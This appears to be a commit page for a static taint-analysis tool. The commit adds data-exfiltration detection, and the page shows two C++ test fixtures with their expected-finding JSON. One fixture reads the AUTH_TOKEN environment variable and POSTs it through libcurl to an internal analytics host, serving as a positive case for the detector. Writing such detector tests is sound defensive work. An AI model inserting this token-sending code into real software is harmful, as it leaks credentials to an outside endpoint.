Add Cap::DATA_EXFIL and taint false-positive/false-negative fixes on real repos (#59)

* feat: Enhance data exfiltration detection with source sensitivity gating for cookies and headers

* feat: Implement cross-file data exfiltration detection with parameter-specific gate filters

* feat: Add calibration tests and refine DATA_EXFIL severity scoring logic

* feat: Introduce per-detector configuration for data exfiltration suppression

* feat: Enhance DATA_EXFIL findings with destination field tracking in diagnostics and SARIF output

* feat: Add tainted body and URL handling for data exfiltration detection

* feat: Add integration tests and fixtures for DATA_EXFIL and SSRF detection in Go

* feat: Add Java integration tests and fixtures for DATA_EXFIL detection across multiple HTTP clients

* feat: Add synthetic externals handling for closure-captured variables in SSA

* feat: Implement closure-based suppression for resource leak findings

* feat: Add regression guards for shell-injection and taint propagation in for-of destructure patterns

* feat: Implement constructor cap narrowing for data exfiltration detection in HTTP request builders

* feat: Add gated sinks for data exfiltration detection in C and C++ using curl_easy_setopt

* feat: Implement DATA_EXFIL cap parity for backwards analysis and add integration tests

* feat: Add data exfiltration sinks for various languages and enhance documentation

* refactor: Simplify formatting and improve readability in various files

* refactor: Improve readability by simplifying conditional statements and adding clippy linting

* docs: Update CHANGELOG and comments for data exfiltration features and configuration

* docs: Clarify configuration instructions for data exfiltration trusted destinations

* docs: Enhance comments for evidence routing logic in data exfiltration
Eli Peter 2026-05-01 10:59:52 -04:00 committed by GitHub
parent a438886217
commit 58f1794a4e
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
189 changed files with 8421 additions and 383 deletions

@@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <cstdlib>
void leak_env() {
    const char *token = std::getenv("AUTH_TOKEN");
    if (!token) return;
    CURL *curl = curl_easy_init();
    curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track");
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token);
    curl_easy_perform(curl);
    curl_easy_cleanup(curl);
}

@@ -0,0 +1,13 @@
{
  "description": "curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body) gated sink in C++: same gating model as the C fixture. The activation arg (CURLOPT_POSTFIELDS) is matched as a preprocessor-macro identifier via the macro-arg fallback, so DATA_EXFIL fires only at the body-binding setopt call. std::getenv is Sensitivity::Sensitive, so DATA_EXFIL must fire.",
  "tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"],
  "modes": ["full"],
  "expected": [
    {
      "rule_id": "taint-data-exfiltration",
      "must_match": true,
      "line_range": [4, 12],
      "notes": "std::getenv(\"AUTH_TOKEN\") → SourceKind::EnvironmentConfig → Sensitivity::Sensitive, so DATA_EXFIL fires on the curl_easy_setopt body-binding call gated by CURLOPT_POSTFIELDS."
    }
  ]
}
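The gated-sink model this fixture relies on can be sketched as a small matching function. This is a minimal, hypothetical illustration in C++ (the analyzer's own implementation is not part of these hunks): `GatedSink` and `gated_payload_arg` are invented names, and comparing the activation argument by its source identifier is an assumption standing in for the macro-arg fallback the description mentions.

```cpp
#include <cassert>
#include <cstddef>
#include <optional>
#include <string>
#include <vector>

// Hypothetical description of a gated sink: the call is only a DATA_EXFIL
// sink when the argument at activation_index equals activation_value.
struct GatedSink {
    std::string callee;           // e.g. "curl_easy_setopt"
    std::size_t activation_index; // argument that selects the call's behaviour
    std::string activation_value; // macro identifier that activates the sink
    std::size_t payload_index;    // argument carrying the outgoing body
};

// Returns the index of the argument whose taint should be checked, or
// std::nullopt when this call does not activate the sink (e.g. CURLOPT_URL).
// Arguments are compared as source identifiers (assumed macro-arg fallback):
// CURLOPT_POSTFIELDS is matched by name, not by its numeric value.
std::optional<std::size_t> gated_payload_arg(const GatedSink& sink,
                                             const std::string& callee,
                                             const std::vector<std::string>& args) {
    if (callee != sink.callee) return std::nullopt;
    if (args.size() <= sink.activation_index || args.size() <= sink.payload_index) {
        return std::nullopt;
    }
    if (args[sink.activation_index] != sink.activation_value) return std::nullopt;
    return sink.payload_index;
}
```

With `GatedSink{"curl_easy_setopt", 1, "CURLOPT_POSTFIELDS", 2}`, the `CURLOPT_URL` call in `leak_env` yields no payload argument, while the `CURLOPT_POSTFIELDS` call yields index 2 (`token`), which is why only the body-binding call is a candidate for DATA_EXFIL.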

@@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <cstdio>
void forward_stdin() {
    char input[256];
    if (!fgets(input, sizeof(input), stdin)) return;
    CURL *curl = curl_easy_init();
    curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward");
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input);
    curl_easy_perform(curl);
    curl_easy_cleanup(curl);
}

@@ -0,0 +1,13 @@
{
  "description": "curl_easy_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source (fgets from stdin). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain (raw user input), and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.cpp to assert per-tier routing for C++.",
  "tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"],
  "modes": ["full"],
  "expected": [
    {
      "rule_id": "taint-data-exfiltration",
      "must_not_match": true,
      "line_range": [4, 12],
      "notes": "Body source is plain user input (fgets from stdin → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources; plain user input echoed into a request body is not data exfiltration."
    }
  ]
}
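The per-tier routing that these two fixtures assert can be sketched as a small decision function. The enum names mirror `SourceKind` and `Sensitivity` from the fixture notes, but this C++ version is only an illustration: `SourceKind::UserInput`, `sensitivity_of`, and `should_report_data_exfil` are hypothetical names, and the analyzer's real types and source-to-tier mapping may differ.

```cpp
#include <cassert>

// Hypothetical mirrors of the types named in the fixture notes. Only
// EnvironmentConfig comes from the notes; UserInput is an assumed stand-in
// for the stdin source in forward_stdin.
enum class SourceKind { EnvironmentConfig, UserInput };
enum class Sensitivity { Plain, Sensitive };

// Assumed mapping, following the fixture notes: environment/config reads are
// Sensitive, raw user input is Plain.
Sensitivity sensitivity_of(SourceKind kind) {
    switch (kind) {
        case SourceKind::EnvironmentConfig: return Sensitivity::Sensitive;
        case SourceKind::UserInput:         return Sensitivity::Plain;
    }
    return Sensitivity::Plain; // not reached for valid enumerators
}

// DATA_EXFIL is reported only when tainted data reaches an activated
// body-binding sink AND its source is Sensitive-tier; Plain sources are
// suppressed by the source-sensitivity gate.
bool should_report_data_exfil(bool reaches_activated_sink, SourceKind source) {
    return reaches_activated_sink &&
           sensitivity_of(source) == Sensitivity::Sensitive;
}
```

Under these assumptions the getenv fixture maps to `should_report_data_exfil(true, SourceKind::EnvironmentConfig)` (reported) and the stdin fixture to `should_report_data_exfil(true, SourceKind::UserInput)` (suppressed), matching the `must_match` / `must_not_match` pair.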